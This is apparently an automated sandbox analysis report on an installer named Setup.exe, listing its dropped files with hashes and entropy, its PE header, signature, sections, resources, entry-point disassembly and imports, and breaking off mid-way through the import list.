SHA-512: | BA4B20471C72DE6C22AF3AACD7418ED506B13160ED32ED28B4E91A2199AD1137B3DF06D9221A3217490FF84D00AEEC03B70A488F5ACF22DD3D2FCB268606119E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9988 |
Entropy (8bit): | 5.202201082913625 |
Encrypted: | false |
SSDEEP: | 192:wV2LGKHKra+EgJh6o0svRtSLzmqAmS1sjy6/zWiOzAyBPrY1rCQ:wV49HKrDEgJ4oTSHmJtoSiUVrwrf |
MD5: | A3B49AFF8C628F5084D67EEB9472CEDF |
SHA1: | 5A5BB00725756F1D2D752FAE042EA1A485DA9BC9 |
SHA-256: | D54359BA0F67574CB278765C01C8736CE30F7BA0C334EFD0257DE870A05400F1 |
SHA-512: | E8E40D4DE1BD280E207F2A9AB9E081D5B93316E8BFC2A10D0BFF80EB255C1F5785BCD6FBE3A15E5ADB56F2C6806C199670B342055E3D539B0E06F5F2CB17ABF5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9988 |
Entropy (8bit): | 5.202201082913625 |
Encrypted: | false |
SSDEEP: | 192:wV2LGKHKra+EgJh6o0svRtSLzmqAmS1sjy6/zWiOzAyBPrY1rCQ:wV49HKrDEgJ4oTSHmJtoSiUVrwrf |
MD5: | A3B49AFF8C628F5084D67EEB9472CEDF |
SHA1: | 5A5BB00725756F1D2D752FAE042EA1A485DA9BC9 |
SHA-256: | D54359BA0F67574CB278765C01C8736CE30F7BA0C334EFD0257DE870A05400F1 |
SHA-512: | E8E40D4DE1BD280E207F2A9AB9E081D5B93316E8BFC2A10D0BFF80EB255C1F5785BCD6FBE3A15E5ADB56F2C6806C199670B342055E3D539B0E06F5F2CB17ABF5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 135168 |
Entropy (8bit): | 6.702799339628459 |
Encrypted: | false |
SSDEEP: | 3072:EWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4CR:5f0accB3gBmmLsiS+SAhCR |
MD5: | 63EEC4B702CBA3B241A629CA9B0966C7 |
SHA1: | 5FDCAF7666ADE1A5B65BA4204771A20045949C3C |
SHA-256: | E640DD754559BDED9648B416DA345766922BE9AD3442638AD4238F461E3742A8 |
SHA-512: | 6C172DCADB4F32428DF8B8C2C644946D69F4C4495B7D59A1F89C48B11830C39DF1DA4996D764899633A067D69A723429A2EDA3AEA02FB1E531002F517426DE6C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 114688 |
Entropy (8bit): | 5.162856156677674 |
Encrypted: | false |
SSDEEP: | 1536:PKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2k:H6whxjgarB/5elDWy4ZNk |
MD5: | DEB2EF5841C03C8199E3B62880855561 |
SHA1: | 2896E5E53C174EEF57068BD1C5D4EBE593D2FD26 |
SHA-256: | 4127B751377338E959EF9C806DACB750D3ADE4044312BD5D18FC88FCFCF71C49 |
SHA-512: | D8B6B96B28003E9B3C264D816761EE2A21E901EE9680D24A09B106985ED35E642125FF240E3EB6474226FB6E9394A522069B650C300ECF21D17F64B460BB17F9 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 81920 |
Entropy (8bit): | 7.9980874815792875 |
Encrypted: | true |
SSDEEP: | 1536:Lx4vE5aMZO37PQYmsF81YsHzyZj3HUZrbTouUoTZ3sA7tDY9egl:+saUOrPQnmbsHc7UEufZ3hteT |
MD5: | 8146518F972046E4A3AB8B7AFED34F41 |
SHA1: | E38256138D51DCC8651562EC46C099739965C94A |
SHA-256: | D0AB7DD5D449479E2A8B94FB02C793774A719EA76D8ABBE0E727320EBF1827DF |
SHA-512: | 076DE92EC7307C1E587FED4E3053F4B61AEF21CCFEABBA17C0FA61F026F3FAE072DD3CE57A2E419BDC77836ED666AFC372228B30296EC14529CFB57271CECF64 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 51200 |
Entropy (8bit): | 7.996465240604242 |
Encrypted: | true |
SSDEEP: | 1536:mqWV4m6Lf8uDp5z4KySdFW0r8aGhx29a1u+wes5CcC:m3Otf8uDpekWoE29ads1C |
MD5: | CF5C8A28E5CB0E61ED033C3EA6EFAA7E |
SHA1: | 95A5CE7B3CA88E5C8A2483AF9585B467AAC325DC |
SHA-256: | E7DAB9A1EF6FEF6EAF979908F89F879D1951F7941BAC2C5DEFA85B71BC28BA42 |
SHA-512: | 4CAB47F1CCE607018F3D4F97232C3442F7EB4786813ED008020237D6189101953363EFB1F29A9A36C0304DA834118A828E3BA623DB01DA94588268A2E1D0D8D6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 48040 |
Entropy (8bit): | 7.051639397887468 |
Encrypted: | false |
SSDEEP: | 768:39BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:39BGmdATGODv7xvTphAiPChgZ2kOE6 |
MD5: | E10C4F74C953CF485827811AD726D7F7 |
SHA1: | 229733B8F94265DAB942D47A476FEC3DC5A0B4D6 |
SHA-256: | E1242E544F51F0B3C5FBA0E4364325D07F9DAFD69A8CA2BDFF95BC9FA441938D |
SHA-512: | D3EC1E2B52CD58ED890D84005ADFF287FD0FF8FAD96981800FE4E0AEC4B9DBEB42E20BA2D550C34C3CCC6682F57188DA8537F03A36D453D73FBDB5C0563B3F23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 120832 |
Entropy (8bit): | 5.691312775542772 |
Encrypted: | false |
SSDEEP: | 1536:ZHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:ZLeAg0Fuz08XvBNbjaAtsPR |
MD5: | A99199AEC5BC87A1EE2F8C545403FC99 |
SHA1: | 96F6AF78FC4A1B3E7584D08CE6B37A509436BF4A |
SHA-256: | CB14578B039ED3E7474AF41D30AD0802E0CB2D14083E455742783B3AC0D40C1D |
SHA-512: | 33858F6C9FE204AE42D4FC5062B80520234429C9B77481F7ED113E0065161D38BB89B68B3B03D7DA488465A24194BFB3C57AE2653F4F6B41DC7FCD46D06B6D72 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71680 |
Entropy (8bit): | 7.996985850796443 |
Encrypted: | true |
SSDEEP: | 1536:Dzj2jmVu8VWhTmuXGP89dqjaExQjdDx0P/r1bdOTKwaqup:DuCVXSdIj8jw3JbEGoup |
MD5: | 19A1CB04B353C4311062EBA6B3698DCA |
SHA1: | FA193375E64A1F0943C0C6101B4855CBA6AEBB06 |
SHA-256: | 794D207C1EF7E7496C18F1537CDD905C8770BA74DD37899E0E5D57E5BC263A02 |
SHA-512: | 8E2B94340B194CB80A85DB4289E008A45A42887627D9D729B87D3A3D14D286D41941EFEBCDC9CDB510BD757BD2988F51FCC302EB9786E87AED7C7E275A23A275 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 75776 |
Entropy (8bit): | 7.9977125434845275 |
Encrypted: | true |
SSDEEP: | 1536:Aqmc6FxQCbt62Wp/PKh7v1HWKL+VO1myp73iAyd9qzMZVvqX9X8Y:Aqmc6Uc827vsKqw1myp73iAW9qIMt8Y |
MD5: | 22CD791ACE0898DD41C34F268CE1BD58 |
SHA1: | 8172A0BD78195B0771FCF47591F5C69A1D684038 |
SHA-256: | E581D98106E4489D2EEE549ADA60B286C8EB16734EA6AFC85460CE7ED5EF8FA6 |
SHA-512: | 9542E2E8023CD5E6146E40215F016029A7E0996860D269284F615BD02CC491FE40FECE9D06B4F0B43B958E6104AF03BECBBF1AB4E17AE349D89EA7DA7129CB89 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98304 |
Entropy (8bit): | 7.998082220994016 |
Encrypted: | true |
SSDEEP: | 1536:3iGJ6CzDBObnA3TTcG8xdJO4xamCEKgRAY1k1NhF6m0SilB08n7fgw5l55BC4H7b:3PzMbETTcGiJOgafElJ1k1L3hSC8rgMV |
MD5: | AE3D975D673229D2DA6CEC3AF9EE9732 |
SHA1: | 797E8261FA697D3FC874D26DA185F257B3B81D5E |
SHA-256: | 68CEF50D6B6FA0AB188BC868F09322A76815473B3CAB69870DF192C82C88A39A |
SHA-512: | 08790808E0825EFBAD01C8C2943FA76C740D869DE6B7C565964C732154311D0A17E1E6F16FA12F7C2BD68323D2D9D78A3756C1E0FA6078F4296EABD5D0835AF5 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 45255 |
Entropy (8bit): | 7.996544831946577 |
Encrypted: | true |
SSDEEP: | 768:PWDnoTjWWU3IPi3NVha+rq/uoa+eMJIzwOXd9VZByhI2raIV60OgJCgDNtTlbjA6:+SjWWiv9Vy27VzHHVoIBhgsQNjbK0 |
MD5: | 443721AB42DC4D5D15C8787F5A514E32 |
SHA1: | 97170DCA5C3F4424CA91713659934C2B172E440A |
SHA-256: | B8A42699C79C3217332DEBDBFA10C68756B768AD0BAD985CBE8B11C108D4EC58 |
SHA-512: | 87B31354964E9E6178D75D0C1B25C99CE422DEA783172FB971D4D69482D14DB6FFDFBA01E2C014228B9509CCF9D82B0E8A5B85FA542C2A800EF1A2AF864B63B3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1205 |
Entropy (8bit): | 3.6847605455787105 |
Encrypted: | false |
SSDEEP: | 12:TyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmvH:TyGS9PvCA433C+sCNC1skNkvQfhSH |
MD5: | BB88411A60DDC0157E8D40D1ED76CD79 |
SHA1: | 117982A5D6D309FB2854CE6C0640D29B75033538 |
SHA-256: | 2A2D98124D316800FE418BA09B228259080EE85D66BEAA46DEE67FEDF597620D |
SHA-512: | 0A83AAE0CD0E5A793292B39A95E9232A2ACFF82E59A5DC294CBC4C5822BC302F61C463A7083A0B47EDE6DF74B3F1C9B021B1BFC3F514B08E36A20A67A6F6426E |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 142336 |
Entropy (8bit): | 6.7126978121624745 |
Encrypted: | false |
SSDEEP: | 3072:o/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7td:o/sZ7HS3zcNPj0nEo3tb2jv |
MD5: | 5042A594DA710E47600836FBC43D6AD4 |
SHA1: | 2DA77CA2E0B3688213130CDF716D15D708571F0B |
SHA-256: | 169E9B982A79E12CCD7946B4BAEE1F4C87C820F404379BE690F01320C3D536E2 |
SHA-512: | 45D9E37D873AA17D6227F25A74908BD90716D5AC0C4AC636EE595C83750BF0631D1C154368BAB8931A875031600C440F68185C06365DE1212C7A612B3866FA57 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 152576 |
Entropy (8bit): | 6.5828820443058795 |
Encrypted: | false |
SSDEEP: | 3072:eT6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/J:SAUkB0CThp6vmVnjphfhnvO5bLezWWtB |
MD5: | 837BF147B892CCED11D8599CE6DA2354 |
SHA1: | C69307105A9A7888C39E351DF7B32BA1018F9C5F |
SHA-256: | 9D93B4F03094FE65B6505E8245BAA7C9BBA085F7D81CAE74E6C98E4047CFD183 |
SHA-512: | 8AC87391D1862A17179BAD2DD75B169D30C2FEB796E05DD34819368CF3D5EEF42F4CB392AEAF910BC6580177D511B11376348AE5087BA473463CC36C2A81522C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 58368 |
Entropy (8bit): | 6.5922539876659005 |
Encrypted: | false |
SSDEEP: | 1536:nq0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu5:q0Imbi80PtCZEMnVIPPBxU |
MD5: | 8E17BE931CE1809DA31A0F6D0B6D2E0D |
SHA1: | FACBF2933A2A37418FE111B1C52BD7E544814DD7 |
SHA-256: | FCE2D1465A77CA597699578BF600BF962FC85DC09BDB68577BCE432D9B20E5B3 |
SHA-512: | 2CB8BCAC36BDE735BDF4D92DC813A749F1123A3DC44CFD3153C20F8C7E32F560FDD26D24761DBE15C0C2436A818CF1A42D427615206CD0BE5397EC9322DF2878 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 122880 |
Entropy (8bit): | 6.332790394280177 |
Encrypted: | false |
SSDEEP: | 3072:yZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDj:yK5vPeDkjGgQaE/loUDj |
MD5: | 3BFDFC2C0298A9F87E726D34816A69CB |
SHA1: | 3AA28889544312273E065763D5C84A44BD57CC6F |
SHA-256: | 0A1AE6C240382136944F010A708AE95DF886A135FA46A08A269228B5C0D942BD |
SHA-512: | D72803247318BF39744BAEC8C5D1B4F6C6B2B8B5E7D94EA059A05457FFBFA18041AE6ACD02681A1C35FFBFA9305F44E15F12688084F2A1ACFDA3C48FB5142073 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 489455 |
Entropy (8bit): | 7.99858200434768 |
Encrypted: | true |
SSDEEP: | 12288:TsroZ9yhYo53qf9MWr2RKSGwIs/eOOgguCb8tb9MedVP0WOjVHh5uj:TkoZ9Y3qf9MWrJwF/eOOghR4e3baxaj |
MD5: | B46FB35146A48B73DFD677FE6DE292A3 |
SHA1: | 0F5A70314A77DF29C9838B9A523F76FD84C352C1 |
SHA-256: | 088F9C381AFD7B2F220F8D7435B46ED382602BB4C29BB5009C448C8CCCF8B111 |
SHA-512: | 5B7C41DFE0F925FD0B4CAE040B4A01A11DA083251F49CB55B2D475366C575C2A7917A37B9CE54353573DFE01A6E02157E7E5425F687ADE5F4A4F56D1E09E3916 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 99328 |
Entropy (8bit): | 7.997987246841129 |
Encrypted: | true |
SSDEEP: | 3072:aETPAswt6/YTUCBiS2S8/JZ4ZB/2GdN43:NPHwt6/nCQLJZ4/1dNw |
MD5: | 4B02E727531966411D004BA983F04C56 |
SHA1: | BE7A75ABA8C66AB7C3B20841E460A8D0DFF42E06 |
SHA-256: | 1D9A3B9E4277B27601BB2A0F75FE1232E5053E828AF698C909142B78FED1B474 |
SHA-512: | 978535D1A0A55160088ED8E5AF815A4B96DE35F361B880D4D06D353299D33EAB625E3A38204BCF2FE59E964AA206CA8CF07BBAFEDF1D4D990EFDD5D5649904F9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:Nlllul9kLZ:NllUG |
MD5: | 087D847469EB88D02E57100D76A2E8E4 |
SHA1: | A2B15CEC90C75870FDAE3FEFD9878DD172319474 |
SHA-256: | 81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013 |
SHA-512: | 4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.978630930088583 |
TrID: |
|
File name: | Setup.exe |
File size: | 1'189'231 bytes |
MD5: | 873f5709bf55a0aaf991044c645cf8eb |
SHA1: | feb9447ba639dff591fb3202dc2709e721e27def |
SHA256: | 633da69035ee5fe3ee2f2f006eab37321c7c127e0a5c39ecaea9a38acc5cb228 |
SHA512: | e49db202a6736eb684d896ee6bf7f0192876977eaa5202c5945948b0aea08c043b3df1cdfc58ded3bde51b2bd2ec86f6f3c180b364f9c3470ea82524c24fa398 |
SSDEEP: | 24576:chYvug7sUOQNncXfPm+9zxBRj0oLvcXwH4OPFvpGIr7CJZ:ALg7s0Kzx/j7zcXwJPFx17m |
TLSH: | F845238B4374406BFEB14EF1B0F1D4B66CBEF68054DA844B8219E9AF75523901B1AB1F |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8..... |
Icon Hash: | cc9aa1716d638ecc |
Entrypoint: | 0x403883 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | be41bf7b8cc010b614bd36bbca606973 |
Signature Valid: | false |
Signature Issuer: | CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 0829E51406B873B17F0EFEA626560718 |
Thumbprint SHA-1: | 3E85990B906DD895BB28206319546E2EEBA81336 |
Thumbprint SHA-256: | 4ED8E9F0EBAC3FB0DCDF981D3D82D8BE6CE03D745AD229D0D929A70C5FA55F57 |
Serial: | 5FDDA5954FDB2F00B1EFD5C8 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 00409268h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00408030h] |
push 00008001h |
call dword ptr [004080B4h] |
push ebp |
call dword ptr [004082C0h] |
push 00000008h |
mov dword ptr [00472EB8h], eax |
call 00007FA85497216Bh |
push ebp |
push 000002B4h |
mov dword ptr [00472DD0h], eax |
lea eax, dword ptr [esp+38h] |
push eax |
push ebp |
push 00409264h |
call dword ptr [00408184h] |
push 0040924Ch |
push 0046ADC0h |
call 00007FA854971E4Dh |
call dword ptr [004080B0h] |
push eax |
mov edi, 004C30A0h |
push edi |
call 00007FA854971E3Bh |
push ebp |
call dword ptr [00408134h] |
cmp word ptr [004C30A0h], 0022h |
mov dword ptr [00472DD8h], eax |
mov eax, edi |
jne 00007FA85496F73Ah |
push 00000022h |
pop esi |
mov eax, 004C30A2h |
push esi |
push eax |
call 00007FA854971B11h |
push eax |
call dword ptr [00408260h] |
mov esi, eax |
mov dword ptr [esp+1Ch], esi |
jmp 00007FA85496F7C3h |
push 00000020h |
pop ebx |
cmp ax, bx |
jne 00007FA85496F73Ah |
add esi, 02h |
cmp word ptr [esi], bx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0xf962 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11c8af | 0x5cc0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xf4000 | 0xf962 | 0xfa00 | 955880a5097bce6ee1e1142b429d7486 | False | 0.913 | data | 7.694370424089605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x104000 | 0xf32 | 0x1000 | 9de3947dffd0e7fa5ae1af4905563fd3 | False | 0.599609375 | data | 5.511097810722672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xf4250 | 0x89ff | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9998867721572735 |
RT_ICON | 0xfcc50 | 0x2b7c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0009881422924902 |
RT_ICON | 0xff7cc | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.6672091131000814 |
RT_ICON | 0x101e34 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.7449908925318761 |
RT_ICON | 0x102f5c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.848404255319149 |
RT_DIALOG | 0x1033c4 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x1034c4 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x1035e0 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x103640 | 0x4c | data | English | United States | 0.8026315789473685 |
RT_MANIFEST | 0x10368c | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
DLL | Import |
---|---|
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, 